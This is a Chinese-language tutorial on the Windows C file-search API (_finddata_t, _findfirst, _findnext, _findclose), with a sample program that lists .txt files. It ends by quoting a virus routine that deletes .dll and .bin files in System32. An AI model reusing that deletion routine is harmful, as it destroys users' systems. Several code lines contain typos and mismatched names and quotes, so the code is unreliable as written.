C 语言文件查找
Struct _finddata_t是用来存储文件各种信息的结构体,使用这个结构体要引用的头文件为“ #include <io.h>”它的结构体定义如下:
struct _finddata_t {
unsigned attrib;
time_t time_create;
time_t time_access;
time_t time_write;
_fsize_t size;
char name[_MAX_FNAME];
};
改结构体中各成员的变量的含义如下:
unsigned atrrib:文件属性的存储位置。它存储一个unsigned单元,用于表示文件的属性。
文件属性是用位表示的,主要有以下一些:
_A_ARCH(存档)、 _A_HIDDEN(隐藏)、 _A_NORMAL(正常)、A_RDONLY(只读)、_A_SUBDIR(文件夹)、_A_SYSTEM(系统)。
_这些都是在中定义的宏,可以直接使用,而本身的意义其实是一个无符号整型(只不过这个整型应该是2的几次幂,从而保证只有一位为 1,而其他位为0)。既然是位表示,那么当一个文件有多个属性时,它往往是通过位或的方式,来得到几个属性的综合。例如只读+隐藏+系统属性,应该为:_A_HIDDEN | _A_RDONLY | _A_SYSTEM 。
time_t time_create:这里的time_t是一个变量类型,实际上就是长整形变量 long int,用来保存从1970年1月1日0时0分0秒到现在时刻的秒数
time_t time_access:文件最后一次被访问的时间。
time_t time_write:文件最后一次被修改的时间。
_fsize_t size:文件的大小(字节数表示)。
char name[_MAX_FNAME]:文件的文件名。这里的_MAX_FNAME是一个常量宏,它在头文件中被定义,表示的是文件名的最大长度。
如何使用这个结构体才能够将文件的信息存储到该结构体的内存空间呢,这就需要
_findfirst,_findnext()和_fineclose()
三个函数的搭配使用,下面介绍这三个函数:
long _findfirst( char filespec, struct _finddata_t *fileinfo );
返回值:如果查找成功的话,将返回一个long型的唯一的查找用的句柄。这个句柄将会在_findnext函数中被使用。失败返回0.
参数:
filespec:标明文件的字符串,可支持通配符。比如:*.c,则表示当前文件夹下的所有后缀为C的文件。
fileinfo :这里就是用来存放文件信息的结构体的指针。这个结构体必须在调用此函数前声明,不过不用初始化,只要分配了内存空间就可以了。函数成功后,函数会把找到的文件的信息放入这个结构体所分配的内存空间中。
int _findnext( long handle, struct _finddata_t *fileinfo );
返回值:若成功返回0,否则返回-1。
参数:
handle:即由_findfirst函数返回回来的句柄。
fileinfo:文件信息结构体的指针。找到文件后,函数将该文件信息放入此结构体中。
int _findclose( long handle );
返回值:成功返回0,失败返回-1。
参数:
handle :_findfirst函数返回回来的句柄。
该结构体和搭配的函数使用的逻辑就是先用_findfirst查找第一个文件,若成功则用返回的句柄,调用_findnext函数查找其他的文件,当查找完毕后用,用_findclose函数结束查找。
下面我们就按照这样的思路来编写一个查找C:\users\administrator\desktop文件夹下的所有txt文档的程序。
程序如下:
#include<stdio.h>
#include<Windows.h>
#include<io.h>
int main(){
//文件路径
char FileWay[128]="C:\\users\\administrator\\desktop\\*.txt";
//定义文件结构体
struct _finddata_t File;
//查找第一个txt文件
long handle=_findfirst(FillWay,&File);
if(handle==-1){
//失败返回值 -1
return -1;
}
printf("%s\n",File.name);
//查找剩下的txt文件
while(!_findnext(handle,&File)){
printf("%s\n",File.name);
}
//关闭文件查找
findcloe(handle);
return 0;
}
编译运行结果为: 找出C:\users\administrator\desktop文件夹中所有的txt文件
当然,在找到所有需要的文件后,不仅仅可以通过终端打印出来,还可以进行删除、改名等操作。一般的C语言病毒会用到这个结构体加配合函数进行找到某一类型的文件然后进行恶意删除,例如某一C语言病毒中的删除操作代码如下:
void Remove()
{
int done;
int i;
struct _finddata_t ffblk;
char *documenttype[3] = {"C://Windows//System32//*.dll”, “C://Windows//System32//*.bin”
};
for (i = 0; i < 3; i++)
{
done = _findfirst(documenttype[i],&ffblk);
remove(ffblk.name);
while (!_findnext(done,&ffblk)){
remove(ffblk.name);
}
_findclose(done);
}
}